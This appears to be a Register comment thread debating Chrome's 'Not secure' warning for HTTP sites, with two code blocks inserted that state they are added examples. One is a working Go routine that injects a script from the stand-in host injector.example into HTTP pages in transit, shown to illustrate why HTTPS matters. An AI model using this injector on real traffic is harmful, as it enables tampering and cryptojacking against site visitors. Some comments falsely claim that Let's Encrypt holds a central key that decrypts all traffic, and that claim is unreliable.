Google Chrome: HTTPS or bust. Insecure HTTP D-Day is tomorrow, folks

Google Chrome users who visit unencrypted websites will be confronted with warnings from tomorrow. The changes will come for surfers using the latest version of Google Chrome, version 68. Any web page not running HTTPS with a valid TLS certificate will show a "Not secure" warning in the Chrome address bar from version 68 …

  1. Tromos

    it's likely that Microsoft, Apple and Mozilla will follow suit

    But only after Apple invent it first.

    1. Anonymous Coward

      Fuck Google, I will use HTTP when I want !!

      HTTP is good enough for almost everything. Hell, Amazon was HTTP between 1995 and 2017. (Only their login page used HTTPS, but no other page.) If HTTP is good enough for Amazon, it's good enough for 99,9% of websites anyway. And banking websites have used HTTPS since forever.

      So this HTTPS movement is sponsored by NSA. So that only NSA can intercept traffic, while no other party can. But it means a lot of downsides, like when you are behind a proxy. So in 99% of web traffic HTTP is fine, yet a sponsored movement forces HTTPS. And all their front-shops (Google, Micro-$haft) enforce HTTPS. Fuck them.

      And let's not forget LAN (local area network), HTTP is fine enough there too ...get off my lawn you insensitive bastard (GOOO/M$$)

      And this centralized Let's Encrypt is shady - guess who is behind it, and can encrypt every one of those websites with one key. Oh it's NSA. And guess why Let's Encrypt has to be dongled with a root process to update the cert every 60 days - so they can slip in a new cert when they need "special access". Not everyone is that dumb, but many are careless. And weren't all these HTTPS websites vulnerable and very accessible to everyone, because of backdoors ("heartbleed").

      1. ravenstar68

        Re: Fuck Google, I will use HTTP when I want !!

        You need to understand how certificates work.

        The certificate system provides a chain of certificates which end with a trusted root certificate. The list of Trusted Root Certificates is kept on the local machine and updated by the OS.

        However it's not the root certificates that are used to encrypt data, it's the actual server certificate.

        So what you could do if you were that concerned is set your cron job to create its own new certificate and then send a certificate signing request off to Let's Encrypt every 60 days instead.

        The real problem with TLS is that not only do companies and institutions MITM TLS connections, but a good proportion of security software does as well.

        While their purpose is benign, this IMHO is a bad choice by the security vendors as it means if your security software is indeed pulling a MITM attack - you lose the chain of trust.

      2. Martin-73 Silver badge

        Re: Fuck Google, I will use HTTP when I want !!

        I think you might be going into tinfoil hat territory with mention of the NSA, but I do agree that some things are fine over HTTP. My own site for example is an early 2000s hodgepodge of usefulish info on telephone wiring and a few pinouts of popular connectors that were useful to me so I shared them with the world.

        Nothing for Ivan (or Donald) to snoop on... so https is unnecessary

    2. alexmorco

      Re: it's likely that Microsoft, Apple and Mozilla will follow suit

      By changing URLs in the WP dashboard, all the site URLs should also be changed. If it doesn't, you may want to force SSL on the WordPress login area by configuring SSL in the wp-config.php file.

      In the wp-config.php file, add the lines of code below where it says “That’s all, stop editing!”. For more you can visit: https://www.cloudways.com/blog/add-free-ssl-certificate-to-wordpress-websites

  2. Christian Berger Silver badge

    It's funny to see that now...

    since the certificate system of TLS has been largely compromised to a point where some countries and companies MITM every connection, Google decides that HTTP is insecure.

    I mean we are long past the time when a passive attacker was a realistic scenario (unless you are at a penny pinching cable ISP). If you want to track a user today, you use one of the many ad-services to do so.

    If Google had security in mind, they'd warn about websites using Javascript. Particularly when those scripts are loaded from external servers. They would gradually work on reducing the number of features web browsers need to implement to make web browsers smaller and therefore more secure.

    We now are at a point when browsers are the most complex single pieces of software a regular person comes into contact with. We now are at a point where TLS, the protocol that is supposed to save us all, is so complex that there's just a handful of implementations around.

    This is not a healthy situation.

    1. Lee D Silver badge

      Re: It's funny to see that now...

      "to a point where some countries and companies MITM every connection,"

      They can only do that if you have physical access to the machines at either end, that's kind of the point of encryption. Commercial MITM requires you to trust a certificate that you would not encounter in the wild and would not be trusted by default in your browser.

      Governments may be different but, pretty much, they can demand you just send them the data, they don't have to decrypt it - but to decrypt it requires the end-point's co-operation. You can't sniff a connection to Facebook from a Chinese PC without Facebook or the browser manufacturer being complicit - and you can't "break" it by using other certs without cert-pinning going ape and warning the user.

      However, that said, working in a school I have a *legal requirement* to monitor every web access. Thus I have no option but to MITM every connection with an internal cert, and denying anything that doesn't present or tries to bypass that cert.

      Unfortunately, it's just not as simple as "just work out what pages the user is looking at that they shouldn't" any more.

      And that's just a UK school. Imagine what some of the big companies that deal with industrial espionage, military projects, etc. have to do to comply with what they need to.

      1. Christian Berger Silver badge

        Re: It's funny to see that now...

        Well in those countries and those governments they simply roll out their own CA. It's a huge security nightmare, of course, but that's a completely different problem.

      2. brainbone

        Re: They can only do that if...

        Unfortunately, no.

        On a visit to the KAUST campus in Saudi Arabia a few years back, the network connections available there MITM'd every HTTPS request with valid/signed wild-card certificates they were able to obtain from "trusted" CAs.

        HTTPS only works if you trust the CAs your browser trusts. When some of those CAs give out certificates to government agencies for domains the government has no business having certificates for, then you really can't trust HTTPS.

        1. Anonymous Coward

          Re: They can only do that if...

          Actually, the complete, accurate statement is "you really can't trust HTTPS".

          Time to design something better?

          And change the way we use it?

          1. vtcodger Silver badge

            Re: They can only do that if...

            Actually, the complete, accurate statement is "you really can't trust HTTPS".

            Probably true. OTOH I personally don't much care except when money is involved. And I try to do as little as possible involving money on-line. I find that face to face, paper, and/or telephones work better and are less inconvenient than online with proper security and are less scary than online without proper security.

            For me, most of the time, https mostly means I can't view a constantly changing array of sites in one browser or other (I have at least six installed) because their certificates have some subtle or not so subtle flaw this week.

            My guess is that most users will have no idea what Google is about with this HTTPS thing. Depending on implementation details, they will either click through any annoying error messages or will whinge until someone shows them how to switch to a different search engine.

            No, I don't know what to do about all this until folks are ready to accept that online security is a very tough problem, the toolkit we are approaching it with is entirely inadequate, and we may have to stop doing some things (e.g. Javascript) that are surely incompatible with secure computing.

            1. brym

              Re: They can only do that if...

              This is starting to sound a lot like the witch-hunt that went on to kill Flash. Except, for JS, it's all just another case of history repeating.

        2. Anonymous Coward

          Re: They can only do that if...

          > HTTPS only works if you trust the CAs your browser trusts. When some of those CAs give out certificates to government agencies for domains the government has no business having certificates for, then you really can't trust HTTPS.

          And do you trust Let's Encrypt CA? I do NOT.

          Not only is Let's Encrypt centralized and already a near monopoly for small and medium websites. They can decrypt all traffic with its central key. And most even run a Let's Encrypt cron job as ROOT on their servers. And the short 60-day cert-life means they can swap you in a new cert - by they I mean NSA and their partners.

          So, HTTP is just as secure for most stuff, and a lot simpler and safer for the server side (think heartbleed backdoor).

          1. Anonymous Coward

            Re: They can only do that if...

            "And do you trust Let's Encrypt CA? I do NOT"

            Let's Encrypt validates websites to exactly the same level as any other standard Certificate Authority (except for EV certs that cost a fortune). The only difference is that they don't have a credit card step in their automated process.

          2. Anonymous Coward

            Re: They can only do that if...

            "They can decrypt all traffic with its central key. "

            I see you don't know how CAs work.

            1. rg287 Silver badge

              Re: They can only do that if...

              I see you don't know how CAs work.

              They don't seem to have much of a handle on TLS1.3, Ephemeral Session Keys or Perfect Forward Secrecy either.

        3. hellwig Silver badge

          Re: They can only do that if...

          And lets not forget when you use Chrome, GOOGLE gets to decide which CAs you trust and don't trust. Want to know one of the "trusted" CAs? Google! That's right, Google can MITM any Chrome browser traffic they want. And why would Google want to know what you're browsing? Gee, maybe because that's how they make billions of dollars a year?

          I'm not saying they MITM anyone, but I'm only saying that because I wouldn't want to get sued.

          1. Anonymous Coward

            Re: They can only do that if...

            "That's right, Google can MITM any Chrome browser traffic they want."

            Why would they want to MITM it with certificate trusts, they can and do it in a far easier way, it's their browser, they will just send the data they want directly.

            Surprised there wasn't a mention of Microsoft, they have theirs too, we know they don't need to use it, they just send all that data directly.

            That certificate isn't for MITM attacks, it's for their issued certs on their services.

            There is a lot of paranoia here.

    2. katrinab Silver badge

      Re: It's funny to see that now...

      "I mean we are long past the time when a passive attacker was a realistic scenario (unless you are at a penny pinching cable ISP)"

      or you operate a public wifi service, possibly one with the same SSID as a large provider.

    3. Adam 1 Silver badge

      Re: It's funny to see that now...

      > I mean we are long past the time when a passive attacker was a realistic scenario

      It seems to me that no-one has shared this fact with a bunch of airlines, ISPs, pretty much every hotel you have ever stayed at.

      I'm afraid that this is pretty close to par for the course. And you can't actually see those who just track rather than actively manipulate the traffic, but I would be amazed if it wasn't an order of magnitude greater.

      Yes, TLS is imperfect because you need to trust a bunch of CAs some of which have been vaporised after spectacularly failing at their only job™, but in terms of risk management, it is night and day improvement. It's like arguing that there's no point locking your door because authorities could just open it with a carefully placed explosive.

      Companies cannot MitM a HTTPS website unless they own the computer. If they own the computer, they can just install their own root CA, but no hotel or airline or internet cafe or ISP can do that to my device.

  3. Anonymous Coward

    No can do

    My hosting will give me a certificate, but I lose PHP functionality if I do... so I won't. (I believe this is basically down to how it's being hosted in the cloud)

    Some redirects are already broken. I went to strobist.com only to be completely blocked when it redirected to strobist.blogspot.com ... and chrome wouldn't let me put in an exception. However, Firefox let me tell it that I knew what was going on.

    Net result is that a few of us have already gone back to Firefox for daily browsing, because Chrome is just too much up its own arse.

    1. Anonymous Coward

      Re: No can do

      " I went to strobist.com only to be completely blocked when it redirected to strobist.blogspot.com"

      use the SAN in the certificate

  4. ratfox Silver badge

    Yay... maybe?

    On one hand, yeah security is good.

    On the other hand, I wouldn't be surprised if the people at Google were completely living in a bubble and did not understand multiple valid reasons for which websites have not switched to HTTPS. I can't even figure out a dark ulterior motive for Google to do this, but it might simply be out of touch with reality.

    1. teknopaul Silver badge

      Re: Yay... maybe?

      One perfectly good reason is that you are publishing HTML, don't have any tracking cookies, have nothing at all to hide and don't have enough viewers to be a target.

      I'm all for security where it is needed. I resent being bullied by Google.

      1. fidodogbreath Silver badge

        Re: Yay... maybe?

        I'm all for security where it is needed. I resent being bullied by Google.

        Indeed. My 4-page personal Wordpress site has absolutely no content that needs to be https-protected. The hosting company has provided free certs (via CPanel), but it has still required annoying make-work on my part.

        1. rg287 Silver badge

          Re: Yay... maybe?

          Indeed. My 4-page personal Wordpress site has absolutely no content that needs to be https-protected. The hosting company has provided free certs (via CPanel), but it has still required annoying make-work on my part.

          Aside from that bit where you send credentials (domain.com/wp-login.php)...

          Also malicious ISPs stuffing in ads, tracking cookies, coinhive.js, etc. You're not protecting your content. You're protecting your visitors...

          As for "make-work", one click-and-forget button? Hardly a problem. My hosts also enabled the Let's Encrypt plugin in cPanel. One click to enable cert generation and then another setting to tell the server to use the certs being produced by the plugin. The work of a minute, one-off and entirely automated. I haven't touched it since.

      2. Anonymous Coward

        Re: Yay... maybe?

        One perfectly good reason is that you are publishing HTML, don't have any tracking cookies, have nothing at all to hide and don't have enough viewers to be a target.

        ----------------------------------------------------------------------------------------------------

        This is short sighted. You are setting up any visitor to your site for a trivial MITM attack. Not cool.

        1. Eeep !

          Re: Yay... maybe?

          Please explain how this is setting up a MITM attack.

          1. Adam 1 Silver badge

            Re: Yay... maybe?

            Anyone who is in that network path can inject, modify or suppress any of the page resources. This includes injecting coinhive.js or worse. This includes "free WiFi hotspots", and probably any hotel or airline you've ever flown. Even a major US ISP was fiddling with some headers at one point. These modifications cannot be made to a HTTPS stream unless you can convince a CA to sign your public key.

            I'm not saying HTTPS is a panacea for all security ills, but I fail to see what is controversial about calling HTTP "Not Secure". It is after all, a long game of "Chinese Whispers" with no capacity to assert that what you see is what the server served or what the server sees is what you sent.

  5. Anonymous Coward

    stuck on HTTP

    "The Chrome update is designed to spur sites still stuck on HTTP to move over to HTTPS"

    I don't understand 'stuck on'. Why does every single website need HTTPS? Has someone assumed that all websites are eCommerce sites? I suppose you would if you were the largest advertising company on the planet, in which case you probably do only think in terms of eCommerce.

    FAIL.

    1. Lee D Silver badge

      Re: stuck on HTTP

      Any website without TLS can have its content modified on the fly by any entity in the path of the request/response.

      Thus any website could have malicious javascript (coin miners, etc.) inserted into it, which the website or visitor wouldn't be able to detect, and the ISP could change adverts to their own, add tracking code (actual real-life cases, impacting your security and privacy, as well as the funding stream of the websites you visit, etc. etc. etc.), and all kinds of other issues - even something in your router (as per recent firmware problems with some routers allowing compromise by "redirecting" your web traffic).

      HTTPS is a good thing. Just not sure about "by default". Technically, it's insecure. Yep. Absolutely 100% correct, so there's no problem highlighting that. The problem will come when it becomes difficult to say "Yes, I bloody know that's an insecure website for the billionth time, shut up already".
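      The on-path rewrite that Adam 1 and Lee D describe above, as an added example in Go that is not from the thread and not from any real injection box: it takes the raw bytes of an HTTP response, splices a script tag into an HTML body and re-serialises the message with a corrected Content-Length, which is all a hotel gateway or ISP proxy has to do. The sample page and the host name injector.example are constructed for this example. The same byte rewrite applied to a TLS stream is rejected by the client's record integrity check, which is the difference the "Not secure" label points at.

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"net/http"
	"strconv"
	"strings"
)

// injectedTag stands in for whatever an on-path device splices in; the host
// name is a placeholder for this example, not a real injector.
const injectedTag = `<script src="http://injector.example/miner.js"></script>`

// rawResponse builds a minimal HTTP/1.1 response, the bytes an origin server
// would put on the wire. It exists only to construct sample input here.
func rawResponse(contentType, body string) string {
	return fmt.Sprintf("HTTP/1.1 200 OK\r\nContent-Type: %s\r\nContent-Length: %d\r\n\r\n%s",
		contentType, len(body), body)
}

// injectIntoHTML modifies one parsed response in place: if it is an
// uncompressed text/html document, a script tag goes in front of </body>.
// Anything else passes through untouched. Content-Length is fixed up so the
// client receives a well-formed message and has nothing to compare against.
func injectIntoHTML(resp *http.Response) error {
	body, err := io.ReadAll(resp.Body)
	resp.Body.Close()
	if err != nil {
		return err
	}
	ct := resp.Header.Get("Content-Type")
	if strings.HasPrefix(ct, "text/html") && resp.Header.Get("Content-Encoding") == "" {
		// Lower-case tag only; a real injector would match case-insensitively.
		if i := bytes.LastIndex(body, []byte("</body>")); i >= 0 {
			var b bytes.Buffer
			b.Write(body[:i])
			b.WriteString(injectedTag)
			b.Write(body[i:])
			body = b.Bytes()
		}
	}
	resp.Body = io.NopCloser(bytes.NewReader(body))
	resp.ContentLength = int64(len(body))
	resp.Header.Set("Content-Length", strconv.Itoa(len(body)))
	return nil
}

// rewriteRawResponse is the whole on-path step: parse the bytes the origin
// sent, modify them, and re-serialise the bytes the client will receive.
func rewriteRawResponse(raw string) (string, error) {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
	if err != nil {
		return "", err
	}
	if err := injectIntoHTML(resp); err != nil {
		return "", err
	}
	var out bytes.Buffer
	if err := resp.Write(&out); err != nil {
		return "", err
	}
	return out.String(), nil
}

// bodyOf parses a serialised response and returns its body, as the client
// would see it.
func bodyOf(raw string) (string, error) {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	b, err := io.ReadAll(resp.Body)
	return string(b), err
}

func main() {
	// Constructed sample page, not captured traffic.
	page := "<html><body><h1>Telephone wiring pinouts</h1></body></html>"
	out, err := rewriteRawResponse(rawResponse("text/html; charset=utf-8", page))
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```

      Nothing in the rewritten message tells the browser it was touched: the status line, headers and length are all consistent, so the page renders with the injected script as if the site had shipped it. Compressed bodies are skipped here only for brevity; an injector would decompress, modify and recompress them.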

      1. david 12 Bronze badge

        Re: Re: stuck on HTTP

        >Thus ... the ISP could change adverts to their own ... <

        The world's largest ad serving company thinks that websites that allow their ads to be replaced are insecure.

        Insecure in what way? Allows ads to be replaced.

    2. Wensleydale Cheese

      Re: stuck on HTTP

      "Has someone assumed that all websites are eCommerce sites?"

      There's a case for any site which demands a login to comment on articles, or worse, read them. Think of plain text passwords, and the way folks reuse the same password across sites.

      But why should anyone running a site which doesn't offer logins offer https?

      "I suppose you would if you were the largest advertising company on the planet, in which case you probably do only think in terms of eCommerce."

      They've been guilty of that for a long time.

    3. David Knapman

      Re: stuck on HTTP

      Troy Hunt has written a *specific* piece on https://www.troyhunt.com/heres-why-your-static-website-needs-https/.

      Now, you may choose to disagree with some of his examples, but in most cases nobody can point to people using HTTPS over HTTP and state that it's *less* secure.

      1. Ian 7

        Re: stuck on HTTP

        Troy Hunt also did an excellent Pluralsight course on what developers need to know about HTTPS. If you've got an account, it's definitely an eye opener

      2. teknopaul Silver badge

        Re: stuck on HTTP

        "nobody can point to people using HTTPS over HTTP and state that it's *less* secure."

        Nobody is suggesting bricking up the windows of your house is less secure.

        Security where it's needed.

        A house with glass windows is not insecure. It's just a house and not a prison.

        1. Glen 1 Silver badge

          Re: stuck on HTTP

          >A house with glass windows is not insecure. It's just a house and not a prison.

          A burglar with a brick/hammer would disagree.

          People on this thread have short memories.

          Remember Phorm?

          Almost impossible over HTTPS.

    4. IGnatius T Foobar ✅

      Re: stuck on HTTP

      Why does every single website need HTTPS? Has someone assumed that all websites are eCommerce sites?

      Exactly. Perhaps you're just publishing some information for everyone to read. What happens if the page is "insecure" and someone sniffs the connection? They get to read the same information that you already published, with the intent that everyone can read it.

      You don't need to encrypt a billboard.

      1. David Knapman

        Re: stuck on HTTP

        If, every time you update your billboard, you find that someone keeps posting outrageously dangerous advice onto the middle of it, but does leave your name prominently associated with it, would you be so relaxed about leaving your billboard unsecured? The biggest risk with HTTP is content being intercepted and *replaced* en-route (malicious scripts, etc)

        Whilst there are some circumstances where HTTPS can be MITMed, it's a strictly smaller subset of the cases where HTTP can be MITMed. So if forcing everyone to abandon HTTP reduces the opportunities for MITMs (and work to further reduce MITM attacks on HTTPS is still ongoing), why are you against it?

    5. Anonymous Coward

      Re: stuck on HTTP

      > Why does every single website need HTTPS?

      They don't.

      HTTP will still work. You'll just get a little bit of grey text saying "Not secure" on your browser bar.

      Move along please.

      1. gnarlymarley Bronze badge

        Re: stuck on HTTP

        HTTP will still work. You'll just get a little bit of grey text saying "Not secure" on your browser bar.

        And I will welcome that text for pages such as news sites that have no logins and do not collect my information. Anyone thinking that HTTPS cannot do MITM is just ignorant.

    6. Anonymous Coward

      Re: stuck on HTTP

      Why does every single website need HTTPS? Has someone assumed that all websites are eCommerce sites? I suppose you would if you were the largest advertising company on the planet, in which case you probably do only think in terms of eCommerce.

      FAIL.

      =======================================================================

      The 'FAIL' is your blinkered misunderstanding of security.

      Every HTTP site creates an attack surface exposing every visitor to MITM, injection, and other attacks.

      Anyone with any sense will avoid such sites like the plague that they might be spreading.

      1. Deltics

        Re: stuck on HTTP

        > Every HTTP site creates an attack surface exposing every visitor to MITM, injection, and other attacks.

        Ironically of course, every HTTPS site is also by definition an HTTP site. The difference in the presence of SSL doesn't change the fact that the basic protocol is the same.

        The "ironically" part therefore comes from the fact that what you say about HTTP is also true about HTTPS. As soon as you put a publicly accessible site out there you have created an attack surface exposing every visitor etc etc etc. Whether that site employs HTTP or HTTPS doesn't alter the accuracy of that statement, only the difficulty involved in exploiting the attack surface you are generously providing.

        1. Anonymous Coward

          Re: stuck on HTTP

          "Ironically of course, every HTTPS site is also by definition an HTTP site. The difference in the presence of SSL doesn't change the fact that the basic protocol is the same."

          Actually it does. SSL/TLS wraps the HTTP protocol (makes a tunnel), making TLS (SSL should never be used) the base protocol for the transport layer, which is the part we are talking about. So the things that need to be looked at for vulnerabilities are in TLS, not HTTP, when authentication, encryption and data integrity are to be considered.

  6. Jason Bloomberg Silver badge

    Two wrongs don't make a right

    At the end of the proverbial day I guess it will come down to whether people consider Google being more wrong to 'block sites' than sites are to not upgrade to https.

    I suspect most people won't have an absolutist view and will just consider the greater wrong to be that Chrome doesn't have an option to turn the feature off.

    And it's no good telling people Letsencrypt certificates are free while also telling them that if they aren't paying for something then they are the product.

    I am somewhat surprised there's not been more of a Net Neutrality argument raised against Google's decision.

    1. knelmes

      Re: Two wrongs don't make a right

      "And it's no good telling people Letsencrypt certificates are free while also telling them that if they aren't paying for something then they are the product."

      I don't think that's the case with the EFF backed letsencrypt. Is it?

  7. Flakk

    Chrome?

    What's that?

    1. dbtx Bronze badge

      Stuff that e.g. Firefox renders which is browser UI and not stuff from over the network.

  8. Pointer2null

    A bit hypocritical

    A bit hypocritical considering their email client defaults to remain logged in and actually forcing it to log out when you close your browser is non-trivial.

    Who cares if you browse the news unencrypted - if anyone gets your machine with email logged in they can have more fun resetting all your passwords.

  9. GruntyMcPugh Silver badge

    The funnier Google related story today,....

    ... is that google Translate is throwing the occasional wobbler and predicting the end of the World.

    Select 'Maori' as the input language, and keep typing the word 'dog' over and over. The translation will change to "Doomsday Clock is three minutes at twelve We are experiencing characters and a dramatic developments in the world" at 16 repetitions. At 18 repetitions it changes to "Doomsday Clock is three minutes at twelve We are experiencing characters and a dramatic developments in the world, which indicate that we are increasingly approaching the end times and Jesus' return"

    Same happens using Indonesian and Hawaiian.

    Try typing the word 'prophecy' in multiple times. Pay attention as you type, it comes up with four different creepy translations as the characters go in, not always when a complete word is typed.

    Have fun!

    1. Florida1920

      Re: The funnier Google related story today,....

      If indeed

      We are experiencing characters and a dramatic developments in the world, which indicate that we are approaching the end times and Jesus' return (Google wouldn't lie, would they?)

      I'm putting off transitioning my site to HTTPS.

  10. Anonymous Coward

    Letsencrypt is free but it sucks

    Sure letsencrypt is free, but for your average joe, it doesn't exactly make deployment easy.

    You can either choose to install some bloated software and trust it to run in crontab.

    Or you can hack around in DNS.

    Ok, fine, neither option is beyond the abilities of your average sysadmin (security concerns aside of third-party scripts).

    But if the likes of Google want to encourage your "average joe" to go SSL the fact that Letsencrypt decided not to support the good old-fashioned CSR route of deployment is not going to help the cause.

    Also where are Letsencrypt code-singing certificates ? Timestamping service? And so on ? Letsencrypt is the basic of the basic and seemingly no plans to go beyond it.

    You get what you pay for in this life.

    1. Pen-y-gors Silver badge

      Re: Letsencrypt is free but it sucks

      @AC

      Also where are Letsencrypt code-singing certificates

      I love the idea of singing certificates! Lines of PHP sung to Queen's greatest hits. Sing-along-a-Python. COBOL as a Bach cantata.

      1. Flashdunce

        Re: Letsencrypt is free but it sucks

        As it happens... https://github.com/dylanbeattie/rockstar

    2. Anonymous Coward

      Re: Letsencrypt is free but it sucks

      > Letsencrypt decided not to support the good old-fashioned CSR

      Bollocks. You *can* send a traditional CSR to Letsencrypt: e.g. using "certbot --csr" or "dehydrated --signcsr".

      Of course, you still need to validate that you own the domain using one of the various supported approaches - such as inserting a TXT record into the DNS. You can do this manually if you wish: "certbot --manual" will give you instructions on what to do interactively.

      But most people prefer not having to do this every 3 months, so they automate it.

      You can even automate signing of CSRs, using csrgrinder: https://github.com/tykling/certgrinder#csrgrinder

  11. Tom Kelsall

    I have LetsEncrypt...and...

    ...and I'm happy with it. It was a piece of P*SS to install on Wordpress and my site meets Google's requirements, and makes people using my site feel all warm and fuzzy and secure.

    That's all I needed from it - I don't understand much more than that?

    1. Mage Silver badge

      Re: I have LetsEncrypt...and...

      Why should Google be the gatekeeper of the Internet and deciding what is acceptable? If it's such a problem lets all agree. Personally 3rd party javascript and data slurping (on almost every HTTPS site) is a bigger issue than sites you don't post on and don't log into only being HTTP.

      uMatrix, NoScript etc are more important. Why isn't the equivalent of them built into every browser? Why are 3rd party cookies not blocked by default?

      Why not have this as user set global option and also easy to change per site along with all the dreck. uMatrix does a good job of blocking garbage.

      HTTPS sites DO serve adverts. Those can have malicious javascript.

      It's worthy to encourage sites to use HTTPS. However Google needs to get their own house in order, one of the most devious and privacy slurping companies on the planet whose "free" services exploit people to make them money from adverts.

    2. Pen-y-gors Silver badge

      Re: I have LetsEncrypt...and...

      Yes, installing Letsencrypt certs on my main reseller a/cs is a P.o.P, but adjusting the .htaccess redirects to make sure it all works, and finding the odd embedded http reference in 10-year-old code is more of a faff, and when you have dozens of sites to work through, there are other priorities. It's also tricky to explain to a small customer why you're adding an extra £50 to this year's hosting bill for a brochure-ware site.

      And sometimes not so easy on shared hosting packages.

      I suspect I'll wait until customers complain, then convert to https, and charge them for the time.

  12. Anonymous Coward

    LetsEncrypt and 90 days

    The other pain in the backside with LetsEncrypt is their tiny 90 day expiry window.

    Sure, if you ask LetsEncrypt, they'll try to sell you the dream of automation and how it makes expiry dates a mere technicality.

    But the scripts are not perfect. I had a LetsEncrypt covered server the other day that had renewed its certificate but not installed it correctly to the webserver.

    So, as far as LetsEncrypt and its logs were concerned, it was done. But the webserver was blissfully living in the previous era.

    Fortunately I've got rolling 90-day (well, 85-day, so I've got a fix window) reminders set in my calendar and I spotted it.

    And before anyone here pipes up "well, you could write a script to check the cert expiry", well sure, but then I need a script to check the script has run (and a script to check the script that checks the script has run).

    So yeah, there's only so far you can trust automation ....
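    Added example (not the commenter's script, and not from Let's Encrypt or certbot): a small Python check for exactly the failure described above, where the renewal job logged success but the web server kept presenting the old certificate. It compares the certificate the live server presents against the renewed file on disk (fingerprint mismatch means the server was never reloaded) and flags imminent expiry. The live path assumes the openssl binary is on PATH and network access; the offline demonstration uses constructed sample output standing in for openssl's.

```python
"""Check the certificate a web server actually presents, not just what the
renewal job logged.  Added example; the live path assumes `openssl` on PATH."""
import ssl
import subprocess
from datetime import datetime, timezone

# Date layout printed by `openssl x509 -noout -enddate`, e.g. "Oct 23 12:00:00 2018 GMT"
_OPENSSL_DATE = "%b %d %H:%M:%S %Y %Z"


def fetch_served_pem(host: str, port: int = 443) -> str:
    """Grab the leaf certificate the live server presents (needs network)."""
    return ssl.get_server_certificate((host, port))


def openssl_summary(pem: str) -> str:
    """Print the enddate and SHA-256 fingerprint of a PEM certificate via openssl."""
    result = subprocess.run(
        ["openssl", "x509", "-noout", "-enddate", "-fingerprint", "-sha256"],
        input=pem, capture_output=True, text=True, check=True)
    return result.stdout


def parse_summary(text: str) -> dict:
    """Parse the 'notAfter=...' and '... Fingerprint=...' lines into a dict."""
    info = {}
    for line in text.splitlines():
        key, _, value = line.partition("=")
        if key == "notAfter":
            info["not_after"] = datetime.strptime(
                value.strip(), _OPENSSL_DATE).replace(tzinfo=timezone.utc)
        elif key.lower().endswith("fingerprint"):   # "SHA256 Fingerprint" or "sha256 Fingerprint"
            info["fingerprint"] = value.strip().upper()
    return info


def assess(served: dict, on_disk: dict, now: datetime, warn_days: int = 5) -> list:
    """Return the problems found: stale deployment and/or (imminent) expiry."""
    problems = []
    if served["fingerprint"] != on_disk["fingerprint"]:
        problems.append("served certificate differs from the renewed one on disk (web server not reloaded?)")
    days_left = (served["not_after"] - now).days
    if days_left < 0:
        problems.append("served certificate expired %d days ago" % -days_left)
    elif days_left < warn_days:
        problems.append("served certificate expires in %d days" % days_left)
    return problems


def check_live(host: str, cert_path: str, warn_days: int = 5) -> list:
    """Compare the live server's cert with the renewed file (needs network and openssl)."""
    with open(cert_path) as f:
        on_disk = parse_summary(openssl_summary(f.read()))
    served = parse_summary(openssl_summary(fetch_served_pem(host)))
    return assess(served, on_disk, datetime.now(timezone.utc), warn_days)


# Constructed sample output, standing in for openssl_summary() results:
# the server still serves the old cert while the renewed one sits on disk.
SAMPLE_SERVED = "notAfter=Jul 30 12:00:00 2018 GMT\nSHA256 Fingerprint=AA:BB:CC\n"
SAMPLE_DISK = "notAfter=Oct 23 12:00:00 2018 GMT\nSHA256 Fingerprint=11:22:33\n"
SAMPLE_NOW = datetime(2018, 7, 27, 12, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    for problem in assess(parse_summary(SAMPLE_SERVED), parse_summary(SAMPLE_DISK), SAMPLE_NOW):
        print("WARNING:", problem)
```

    Run `check_live("www.example.org", "/etc/letsencrypt/live/www.example.org/fullchain.pem")` (paths are whatever the renewal job writes) from a separate host or cron job so the check does not depend on the machine whose reload failed; the point is to test the externally observable result, not the log of the job that was supposed to produce it.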

  13. Mage Silver badge

    Stupid and arrogant

    And how is it relevant on sites you don't log into, and only read?

    Given the BLOODY illegal data slurping that Google does via analytics, search, fonts, apis and all google owned services?

    Misleading hypocrisy!

    Misleading about security too given the amount of javascript from 3rd party sites on the typical HTTPS site.

    1. JDX Gold badge

      Re: Stupid and arrogant

      El Reg included information about why it's relevant in the article. Did you read it? Did you even search for "why is HTTP relevant..." yourself?

  14. Flywheel Silver badge

    Hard times head for the "family IT guy"

    If you're one of those poor sods that provides IT support for the family and have to deal with Auntie's "if it winks at you, click it" habit, I predict you'll see an unwelcome increase in workload as panicking relatives start phoning you to say the Internet's not secure any more. Good luck!

  15. DrXym Silver badge

    Now how about a way to get a hassle free cert

    It's great that Google are doing this but it would have been even better if there were a simple, convenient way for sites to obtain a cert that:

    a) Doesn't require any major effort to obtain. i.e. I should not have to pay money or submit government documentation, or undergo a rectal exam just for a cert.

    b) Has an expiration period that I can choose. Maybe some people like their certs to expire every 12 months. Personally I'm happy for my cert to go years, decades unless I explicitly revoke it myself. IMO the main reason they expire so quick is repeat customers.

    c) Doesn't cost any money. CAs are basically a tax on trust.

    Things like Let's Encrypt have tried to make it easier to get a free key but it's still way too difficult. Just let me fill in a form, do a simple site ownership check (e.g. uploading a file to a path on the server) and get a key.

    1. Anonymous Coward
      Anonymous Coward

      Re: Now how about a way to get a hassle free cert

      "Things like Let's Encrypt have tried to make it easier to get a free key but it's still way too difficult. "

      And that's exactly the point I made above !

      If LetsEncrypt left the old-fashioned "paste your CSR in a form and upload a verification file to your website" then it would be much easier than their very convoluted process where you can't even get started without running scripts and other nonsense.

    2. Drew 11

      Re: Now how about a way to get a hassle free cert

      The tech is already there.

      It's called DNSSEC and DANE. No need to go to LetsEncrypt (who are owned by...?)

      The only thing holding up DANE are the browser manufacturers who refuse to bake it into their code.

      High time TheReg went to them and asked them "why the hell not?"

    3. Cavanuk

      Re: Now how about a way to get a hassle free cert

      "a) Doesn't require any major effort to obtain. i.e. I should not have to pay money or submit government documentation, or undergo a rectal exam just for a cert.

      b) Has an expiration period that I can choose. Maybe some people like their certs to expire every 12 months. Personally I'm happy for my cert to go years, decades unless I explicitly revoke it myself. IMO the main reason they expire so quick is repeat customers.

      c) Doesn't cost any money. CAs are basically a tax on trust."

      So you want certificates that anyone can get, with no effort or being subject to stringent checks? What would be the point of those certs? The cost results from maintaining a certificate authority that, theoretically, checks that someone actually is who they say they are. Even if they are just checking documentation, those carrying out the checks have to be paid.

      1. DrXym Silver badge

        Re: Now how about a way to get a hassle free cert

        "So you want certificates that anyone can get, with no effort or being subject to stringent checks?"

        Yes.

